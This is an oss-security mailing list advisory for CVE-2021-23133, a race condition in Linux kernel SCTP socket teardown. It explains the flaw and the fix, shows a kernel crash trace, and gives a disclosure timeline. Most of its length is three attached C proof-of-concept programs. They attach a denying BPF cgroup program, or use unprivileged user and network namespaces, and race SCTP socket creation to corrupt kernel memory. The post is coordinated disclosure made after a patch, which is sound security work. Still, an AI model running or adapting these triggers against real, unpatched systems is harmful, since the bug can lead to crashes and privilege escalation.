[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2021-23133: Linux kernel: race condition in sctp sockets
From:       Or Cohen <orcohen () paloaltonetworks ! com>
Date:       2021-04-18 8:41:06
Message-ID: CAM6JnLex-+TM+p5aNrcifxG3qmpL+gfXzSTzWpVpbj3_hsp_Fw () mail ! gmail ! com
[Download RAW message or body]

Hello,

This is an announcement about CVE-2021-23133 which is a race-condition
I found in Linux kernel sctp sockets (net/sctp/socket.c). It can lead to kernel
privilege escalation from the context of a network service or from
an unprivileged process if certain conditions are met.

The bug was fixed on April 13, 2021:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b166a20b07382b8bc1dcee2a448715c9c2c81b5b


=*=*=*=*=*=*=*=*=   VULNERABILITY DETAILS - sctp_destroy_sock list_del
race condition =*=*=*=*=*=*=*=*=

All of the code figures below are from kernel version 5.11

The netns_sctp struct contains sctp related information per network namespace,
one if it's fields is the auto_asconf_splist list.
As the list can be accessed from multiple threads, every access to the list
should be protected by the addr_wq_lock spinlock.

(include/net/netns/sctp.h - netns_sctp structure)
...
    struct list_head addr_waitq;
    struct timer_list addr_wq_timer;
    struct list_head auto_asconf_splist;
    /* Lock that protects both addr_waitq and auto_asconf_splist */
    spinlock_t addr_wq_lock;
...

The sctp_sock struct contains the auto_asconf_list field which is used in order
to add elements to the auto_asconf_splist.

(include/net/sctp/struct.h - sctp_sock structure)
...
    struct list_head auto_asconf_list;
...

When creating a sctp socket, the sctp_init_sock method is called, after
setting up and initializing the sock structure, the following code
is executed in the end of the function:

(net/sctp/socket.c - sctp_init_sock function)
...
if (net->sctp.default_auto_asconf) {
spin_lock(&sock_net(sk)->sctp.addr_wq_lock);
list_add_tail(&sp->auto_asconf_list,
    &net->sctp.auto_asconf_splist);
sp->do_auto_asconf = 1;
spin_unlock(&sock_net(sk)->sctp.addr_wq_lock);
}
...

net->sctp.default_auto_asconf can be set to true via writing to the
proc variable "/proc/sys/net/sctp/default_auto_asconf", which is per
network namespace. If this variable is set, the socket will be added to
the per network namespace auto_asconf_list and do_auto_asconf will be set
to 1 in the socket.

The bug lies in the sctp_destroy_sock function, this function assumes that
when it's called, the addr_wq_lock is held, so it allows itself to run the
following code without any additional locking mechanism:
...
    if (sp->do_auto_asconf) {
sp->do_auto_asconf = 0;
list_del(&sp->auto_asconf_list);
}
...

However, there are 2 places in kernel code where sk_common_release (which
calls sctp_destroy_sock) is called without taking the lock:
1. In sctp_accept, if the sctp_sock_migrate function fails.
2. In inet_create or inet6_create, if there is a bpf program
   attached to BPF_CGROUP_INET_SOCK_CREATE which denies
   creation of the sctp socket.

=*=*=*=*=*=*=*=*=   TRIGGERING THE VULNERABILITY   =*=*=*=*=*=*=*=*=

I wrote a poc (stcp_race_priv_user.c) which triggers the vulnerability
via technique (2), the poc
simply attaches BPF_CGROUP_SOCK program to BPF_CGROUP_INET_SOCK_CREATE
which denies creation of any socket, and then runs 2 threads that
each one of them creates sctp sockets in a loop. The race is then triggered
and list_add corruption is detected in sctp_init_sock. When running with
CONFIG_DEBUG_LIST the kernel is crashing immediately:

The call stack is as follows:
...
[   69.693724] list_add corruption. prev->next should be next
(ffffffff829fa980), but was dead000000000100. (prev=ffff8881079b8538).
[   69.694693] WARNING: CPU: 12 PID: 409 at lib/list_debug.c:28
__list_add_valid+0x4d/0x70
[   69.695345] Modules linked in:
[   69.695601] CPU: 12 PID: 409 Comm: test_sctp_race Not tainted 5.11.0 #74
[   69.696167] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   69.696949] RIP: 0010:__list_add_valid+0x4d/0x70
[   69.697336] Code: c3 48 89 c1 48 c7 c7 10 97 59 82 e8 4d 4f c1 ff
0f 0b 31 c0 c3 48 89 d1 48 c7 c7 60 97 59 82 48 89 f2 48 89 c6 e8 33
4f c1 ff <0f> 0b 31 c0 c3 48 89 fe 48 89 c1 48 c7 c7 b0 97 59 82 e8 1c
4f c1
[   69.698864] RSP: 0018:ffffc90000647e48 EFLAGS: 00010282
[   69.699300] RAX: 0000000000000000 RBX: ffff8881079a8000 RCX: 0000000000000000
[   69.699903] RDX: ffff88842fd27860 RSI: ffff88842fd17a50 RDI: ffff88842fd17a50
[   69.700487] RBP: ffffffff829fa000 R08: 0000000000000003 R09: 0000000000000001
[   69.701086] R10: ffff888100c83a60 R11: ffffc90000647c58 R12: ffff8881079b8538
[   69.701688] R13: ffff8881079a8538 R14: ffffffff829fa980 R15: 0000000000000084
[   69.702273] FS:  00007f2fb82c7b40(0000) GS:ffff88842fd00000(0000)
knlGS:0000000000000000
[   69.702950] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   69.703426] CR2: 00007f2fb76bcff8 CR3: 0000000107960004 CR4: 00000000003706e0
[   69.704019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   69.704601] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   69.705200] Call Trace:
[   69.705414]  sctp_init_sock+0x339/0x380
[   69.705759]  inet_create+0x1ac/0x350
[   69.706054]  __sock_create+0xfd/0x200
[   69.706365]  __sys_socket+0x55/0xd0
[   69.706674]  ? exit_to_user_mode_prepare+0x2f/0x120
[   69.707079]  __x64_sys_socket+0x11/0x20
[   69.707398]  do_syscall_64+0x33/0x40
[   69.707715]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   69.708139] RIP: 0033:0x7f2fb77a7f17
...

This specific poc (stcp_race_priv_user.c) requires CAP_BPF and
CAP_NET_ADMIN capabilities in order
to attach the bpf program, according to https://lwn.net/Articles/820560/,
this is still considered a security boundary.

=*=*=*=*=*=*=*=*=   TRIGGERING FROM UNPRIVILEGED USER  =*=*=*=*=*=*=*=*=

However, if a BPF_CGROUP_INET_SOCK_CREATE program  is already attached,
such that an unprivileged user can fail a creation of some sctp socket,
then the vulnerability can be triggered by an unprivileged user if unprivileged
 user namespaces are enabled, by creating a new user and network
namespace, setting
"/proc/sys/net/sctp/default_auto_asconf" in the new network namespace
and then racing between the 2 threads.

This can be demonstrated by the following files:

1. load_bpf_prog.c - Which loads the BPF_CGROUP_INET_SOCK_CREATE, and should
    be run from a privileged process.
2. stcp_race_unpriv_user.c - Which can be run from a regular, unprivileged
    user.

I haven't checked, but there are probably network security tools which attaches
bpf program to BPF_CGROUP_INET_SOCK_CREATE.

Regarding triggering via technique (2), which is failing sctp_sock_migrate in
sctp_accept, I've tried many tricks in order to fail sctp_sock_migrate
but eventually this requires failing some kmalloc or crypto calls,
which I couldn't
fail in a modern Ubuntu with almost the latest kernel.
However, it may be possible to do that in older kernel versions, or with
some other trick which I am not aware about, or if sctp_accept or
sctp_sock_migrate
changes in the future.

Note that by triggering via this technique, the vulnerability can be triggered
from an unprivileged user without the BPF_CGROUP_INET_SOCK_CREATE
program attached.

=*=*=*=*=*=*=*=*=    TIMELINE    =*=*=*=*=*=*=*=*=

2021-04-08: Bug reported to security () kernel org and linux-distros
() vs openwall org
2021-04-13: Patch submitted to netdev
2021-04-17: Patch committed to mainline kernel
2021-04-18: Public announcement

=*=*=*=*=*=*=*=*=     CREDIT     =*=*=*=*=*=*=*=*=

Or Cohen
Palo Alto Networks


["sctp_race_priv_user.c" (application/octet-stream)]

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include "bpf_insn.h"
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

#define SCTP_AUTO_ASCONF       30
#define SOL_SCTP	132

char bpf_log_buf[BPF_LOG_BUF_SIZE];

static int prog_load(__u32 idx, __u32 mark, __u32 prio)
{
	struct bpf_insn prog_start[] = {
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
	};
	struct bpf_insn prog_end[] = {
		BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = verdict */
		BPF_EXIT_INSN(),
	};

	struct bpf_insn *prog;
	size_t insns_cnt;
	void *p;
	int ret;

	insns_cnt = sizeof(prog_start) + sizeof(prog_end);

	p = prog = malloc(insns_cnt);
	if (!prog) {
		fprintf(stderr, "Failed to allocate memory for instructions\n");
		return EXIT_FAILURE;
	}

	memcpy(p, prog_start, sizeof(prog_start));
	p += sizeof(prog_start);

	memcpy(p, prog_end, sizeof(prog_end));
	p += sizeof(prog_end);

	insns_cnt /= sizeof(struct bpf_insn);

	ret = bpf_load_program(BPF_PROG_TYPE_CGROUP_SOCK, prog, insns_cnt,
				"GPL", 0, bpf_log_buf, BPF_LOG_BUF_SIZE);

	free(prog);

	return ret;
}

void * create_sock_thread_function(void *arg)
{
    while(1)
    {
        int s1 = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);
        if(s1 > 0)
        {
            printf("This should not happen!!!!\n");
            close(s1);
        }
    }
    return NULL;
}

static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);

	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		close(fd);
		return false;
	}
	close(fd);
	return true;
}


bool set_default_auto_asconf()
{
    if (!write_file("/proc/sys/net/sctp/default_auto_asconf", "1"))
    {
        perror("Failed to write to default_auto_asconf\n");
        return false;
    }
    return true;
}


/*
    Required capabilities:

        kernel >= 5.8 -
            CAP_BPF, CAP_NET_ADMIN

        kernel < 5.8 -
            CAP_SYS_ADMIN
    
*/
int main(int argc, char **argv)
{
    printf("sctp race poc - privileged user\n");
    char* cgrp_path;
    if (argv[1])
    {
        cgrp_path = argv[1];
    }
    else
    {
        cgrp_path = "/sys/fs/cgroup/unified";
    }

    int cg_fd = open(cgrp_path, O_DIRECTORY | O_RDONLY);
	if (cg_fd < 0)
	{
		printf("Failed to open cgroup path: '%s'\n", strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Opened cgroup path =  %s\n", cgrp_path);

    if (!set_default_auto_asconf())
    {
        return EXIT_FAILURE;
    }

    printf("Successfuly enabled /proc/sys/net/sctp/default_auto_asconf\n");

    int prog_fd = prog_load(0, 0, 0);
    if( prog_fd < 0 )
    {
        perror("prog_load failed\n");
        return 1;
    }

    printf("Successfuly loaded a BPF_PROG_TYPE_CGROUP_SOCK program\n");

    int ret = bpf_prog_attach(prog_fd, cg_fd,
				      BPF_CGROUP_INET_SOCK_CREATE, 0);
	if (ret < 0)
    {
		printf("Failed to attach prog to cgroup: '%s'\n",
			    strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Successfuly attached the program to BPF_CGROUP_INET_SOCK_CREATE\n");

    sleep(1);

    pthread_t create_sock_thread;
    if (pthread_create(&create_sock_thread,
                       NULL,
                       create_sock_thread_function,
                       NULL))
    {
        printf("pthread_create failed with error =  '%s'\n",
			    strerror(errno));
        return EXIT_FAILURE;
    }

    printf("Kernel should crash soon.. (if CONFIG_DEBUG_LIST is enabled)\n");
    create_sock_thread_function(NULL);
    return 0;
}

["sctp_race_unpriv_user.c" (application/octet-stream)]

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

#define SCTP_AUTO_ASCONF       30
#define SOL_SCTP	132

void * create_sock_thread_function(void *arg)
{
    while(1)
    {
        int s1 = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);
        if(s1 > 0)
        {
            printf("This should not happen!!!!\n");
            close(s1);
        }
    }
    return NULL;
}

static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);

	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		close(fd);
		return false;
	}
	close(fd);
	return true;
}


bool set_default_auto_asconf()
{
    if (!write_file("/proc/sys/net/sctp/default_auto_asconf", "1"))
    {
        perror("Failed to write to default_auto_asconf\n");
        return false;
    }
    return true;
}


void setup_sandbox()
{
	int real_uid = getuid();
	int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0)
    {
		perror("unshare(CLONE_NEWUSER)");
		exit(EXIT_FAILURE);
	}

    if (unshare(CLONE_NEWNET) != 0)
    {
		perror("unshare(CLONE_NEWUSER)");
		exit(EXIT_FAILURE);
	}

	if (!write_file("/proc/self/setgroups", "deny"))
    {
		perror("write_file(/proc/self/set_groups)");
		exit(EXIT_FAILURE);
	}

	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid))
    {
		perror("write_file(/proc/self/uid_map)");
		exit(EXIT_FAILURE);
	}

	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid))
    {
		perror("write_file(/proc/self/gid_map)");
		exit(EXIT_FAILURE);
	}
}


/*
    NOTE::
    This specific poc of the vulnerability assumes that a BPF_CGROUP_INET_SOCK_CREATE
    program was already loaded and that it rejects creation of sctp sockets.

    Compile with:
        gcc sctp_race_unpriv_user.c -lpthread
*/
int main(int argc, char **argv)
{
    printf("sctp race poc - unprivileged user\n");
    printf("uid = %d\n", getuid());

    printf("Trying to create a new user and network namespace\n");

    setup_sandbox();

    printf("Running in a new user and network namespace\n");

    if (!set_default_auto_asconf())
    {
        return EXIT_FAILURE;
    }

    printf("Successfuly enabled default_auto_asconf in a new network namespace\n");

    pthread_t create_sock_thread;
    if (pthread_create(&create_sock_thread,
                       NULL,
                       create_sock_thread_function,
                       NULL))
    {
        printf("pthread_create failed with error =  '%s'\n",
			    strerror(errno));
        return EXIT_FAILURE;
    }

    printf("Kernel should crash soon.. (if CONFIG_DEBUG_LIST is enabled)\n");
    create_sock_thread_function(NULL);
    return 0;
}

["load_bpf_prog.c" (application/octet-stream)]

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include "bpf_insn.h"
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

char bpf_log_buf[BPF_LOG_BUF_SIZE];

static int prog_load(__u32 idx, __u32 mark, __u32 prio)
{
	struct bpf_insn prog_start[] = {
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
	};
	struct bpf_insn prog_end[] = {
		BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = verdict */
		BPF_EXIT_INSN(),
	};

	struct bpf_insn *prog;
	size_t insns_cnt;
	void *p;
	int ret;

	insns_cnt = sizeof(prog_start) + sizeof(prog_end);

	p = prog = malloc(insns_cnt);
	if (!prog) {
		fprintf(stderr, "Failed to allocate memory for instructions\n");
		return EXIT_FAILURE;
	}

	memcpy(p, prog_start, sizeof(prog_start));
	p += sizeof(prog_start);

	memcpy(p, prog_end, sizeof(prog_end));
	p += sizeof(prog_end);

	insns_cnt /= sizeof(struct bpf_insn);

	ret = bpf_load_program(BPF_PROG_TYPE_CGROUP_SOCK, prog, insns_cnt,
				"GPL", 0, bpf_log_buf, BPF_LOG_BUF_SIZE);

	free(prog);

	return ret;
}

int main(int argc, char **argv)
{
    char* cgrp_path;
    if (argv[1])
    {
        cgrp_path = argv[1];
    }
    else
    {
        cgrp_path = "/sys/fs/cgroup/unified";
    }

    int cg_fd = open(cgrp_path, O_DIRECTORY | O_RDONLY);
	if (cg_fd < 0)
	{
		printf("Failed to open cgroup path: '%s'\n", strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Opened cgroup path =  %s\n", cgrp_path);

    int prog_fd = prog_load(0, 0, 0);
    if( prog_fd < 0 )
    {
        perror("prog_load failed\n");
        return 1;
    }

    printf("Successfuly loaded a BPF_PROG_TYPE_CGROUP_SOCK program\n");

    int ret = bpf_prog_attach(prog_fd, cg_fd,
				      BPF_CGROUP_INET_SOCK_CREATE, 0);
	if (ret < 0)
    {
		printf("Failed to attach prog to cgroup: '%s'\n",
			    strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Successfuly attached the program to BPF_CGROUP_INET_SOCK_CREATE\n");
    return 0;
}


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic